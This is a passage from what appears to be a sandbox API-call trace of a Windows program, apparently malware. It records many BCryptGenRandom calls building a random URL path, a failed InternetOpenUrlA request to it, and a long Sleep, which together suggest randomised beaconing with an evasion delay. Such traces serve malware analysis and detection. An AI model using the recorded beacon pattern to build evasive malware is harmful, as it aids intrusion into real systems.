(hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.463] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.463] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.463] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.464] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.464] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.464] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.464] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.464] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.464] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.465] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.465] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.465] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.465] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.465] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.465] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.465] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.465] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.466] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.466] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.466] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.466] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.466] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.466] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.466] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.466] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.466] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.466] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.467] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.467] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.467] GetProcessHeap () returned 0x440000 [0229.467] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472f30 [0229.467] lstrcpyA (in: lpString1=0x472f30, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0229.467] lstrcatA (in: lpString1="\x04", lpString2="/ftng6rkzdyx5xpufyS05j9T4t64fz/01t9ofnqyw4qlYad7yb2t5oevu4xor0dex7/kyapyhxjVrj5Zj26Hsrd4cH43d6x32djd/Vxd3y6gls44pf04UHnoxs26P7uWqJw9jauercqilhidflr6/cddwI5vkewlvduika7e0p/" | out: lpString1="\x04/ftng6rkzdyx5xpufyS05j9T4t64fz/01t9ofnqyw4qlYad7yb2t5oevu4xor0dex7/kyapyhxjVrj5Zj26Hsrd4cH43d6x32djd/Vxd3y6gls44pf04UHnoxs26P7uWqJw9jauercqilhidflr6/cddwI5vkewlvduika7e0p/") returned="\x04/ftng6rkzdyx5xpufyS05j9T4t64fz/01t9ofnqyw4qlYad7yb2t5oevu4xor0dex7/kyapyhxjVrj5Zj26Hsrd4cH43d6x32djd/Vxd3y6gls44pf04UHnoxs26P7uWqJw9jauercqilhidflr6/cddwI5vkewlvduika7e0p/" [0229.467] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0229.467] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/ftng6rkzdyx5xpufyS05j9T4t64fz/01t9ofnqyw4qlYad7yb2t5oevu4xor0dex7/kyapyhxjVrj5Zj26Hsrd4cH43d6x32djd/Vxd3y6gls44pf04UHnoxs26P7uWqJw9jauercqilhidflr6/cddwI5vkewlvduika7e0p/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0229.467] GetProcessHeap () returned 0x440000 [0229.467] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472f30 | out: hHeap=0x440000) returned 1 [0229.467] GetProcessHeap () returned 0x440000 [0229.467] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a02050 | out: hHeap=0x440000) returned 1 [0229.467] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0229.468] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0229.468] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.468] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0229.468] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0229.468] Sleep (dwMilliseconds=0x18a31) [0229.712] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.712] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0229.712] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.712] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0229.712] GetProcessHeap () returned 0x440000 [0229.712] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xf7) returned 0x3a02b50 [0229.713] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.713] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0229.713] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.713] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02b51, cbBuffer=0x1d, dwFlags=0x2 | out: pbBuffer=0x3a02b51) returned 0x0 [0229.713] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.713] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.713] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.713] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.714] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.714] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.714] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.714] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.714] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.714] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.715] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.715] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.715] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.715] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.715] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.715] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.715] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.715] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.715] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.715] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.715] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.715] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.716] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.716] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.716] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.716] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.716] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.716] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.716] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.716] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.716] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.716] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.716] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.716] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.717] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.717] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.717] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.717] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.717] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.717] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.717] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.717] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.718] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.718] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.718] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.718] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.718] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.718] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.718] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.718] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0229.719] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.719] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02b6e, cbBuffer=0x11, dwFlags=0x2 | out: pbBuffer=0x3a02b6e) returned 0x0 [0229.719] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.719] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.719] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.719] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.719] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.719] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.720] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.720] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.720] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.720] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.720] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.720] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.720] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.720] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.720] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.720] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.721] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.721] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.721] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.721] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.721] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.721] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.722] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.722] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.722] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.722] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.722] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.722] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0229.722] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.722] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02b7f, cbBuffer=0x29, dwFlags=0x2 | out: pbBuffer=0x3a02b7f) returned 0x0 [0229.723] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.723] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.723] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.723] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.723] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.723] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.723] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.723] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.723] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.723] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.724] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.724] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.724] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.724] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.724] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.724] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.724] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.724] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.724] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.724] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.725] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.725] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.725] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.725] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.725] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.725] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.725] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.725] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.725] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.725] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.725] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.725] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.726] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.726] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.726] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.726] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.726] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.726] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.726] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.726] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.726] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.726] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.727] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.727] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.727] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.728] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.728] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.728] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.728] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.729] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.729] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.729] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: 